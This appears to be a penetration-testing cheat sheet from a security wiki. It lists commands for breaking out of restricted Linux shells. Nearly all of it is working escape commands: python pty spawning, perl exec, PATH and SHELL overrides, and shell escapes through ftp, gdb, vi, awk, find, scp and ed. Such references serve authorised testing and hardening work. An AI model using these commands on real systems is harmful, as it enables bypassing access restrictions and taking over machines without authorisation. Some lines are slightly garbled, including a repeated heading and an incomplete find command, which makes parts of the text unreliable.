Restricted shell escape

check what you can do:

echo $PATH
echo $SHELL
echo $ENV
ls -al bin

Try and break out:

python -c 'import pty;pty.spawn("/bin/bash")'
perl -e 'exec "/bin/sh";'

export PATH=/bin:/usr/bin:/sbin:$PATH
export SHELL=/bin/sh
set PATH=/bin:/usr/bin:/sbin:$PATH
set SHELL=/bin/sh

cp /bin/sh /current/directory; sh

Taking help of binaries

Some commands let us execute other system commands, often bypassing shell restrictions

ftp -> !/bin/sh
gdb -> !/bin/sh
more/ less/ man -> !/bin/sh
vi -> :!/bin/sh : Refer Breaking out of Jail : Restricted Shell and Restricted Accounts and Vim Tricks in Linux and Unix
scp -S /tmp/getMeOut.sh x y : Refer Breaking out of rbash using scp
awk ‘BEGIN {system(“/bin/sh”)}’
find / -name someName -exec /bin/sh ;
tee
ed --> !'/bin/bash' --> export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

PreviousLinux Escalate NextLAPS

Last updated 3 years ago

hashtagcheck what you can do:

check what you can do: